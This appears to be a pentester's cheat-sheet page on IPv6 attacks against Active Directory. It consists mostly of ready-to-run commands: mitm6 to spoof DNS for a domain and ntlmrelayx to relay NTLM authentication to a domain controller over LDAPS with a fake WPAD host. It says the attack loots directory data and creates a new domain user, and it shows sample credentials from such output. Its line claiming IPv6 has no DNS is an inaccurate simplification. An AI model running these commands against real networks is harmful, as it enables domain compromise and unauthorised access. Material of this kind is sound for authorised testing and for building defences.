IPv6 Attacks

There's no dns for IPv6 (only for IPv4) so we can spoof it with mitm6

Mitm6

• Fetch it here

• mitm6 command mitm6 -d domain-name.local

• ntlmrelay ntlmrelayx.py -6 -t ldaps://DOMAIN-CONTROLLER-IP -wh fakewpad.domain.local -l lootme

• Once the attack is successful we get a folder lootme with plenty of info from the DC

• If during the attack and admin logs in win 10 machine, mitm6 will create a new user for us: [*] Adding new user with username: YrAjkDnwzM and password: SHq]d(88dr%5+3R result: OK

Mitm6 - Resources

mitm6 – compromising IPv4 networks via IPv6Fox-IT International blog

Mitm6

The worst of both worlds: Combining NTLM Relaying and Kerberos delegationdirkjanm.io

Combining NTLM Relaying and Kerberos delegation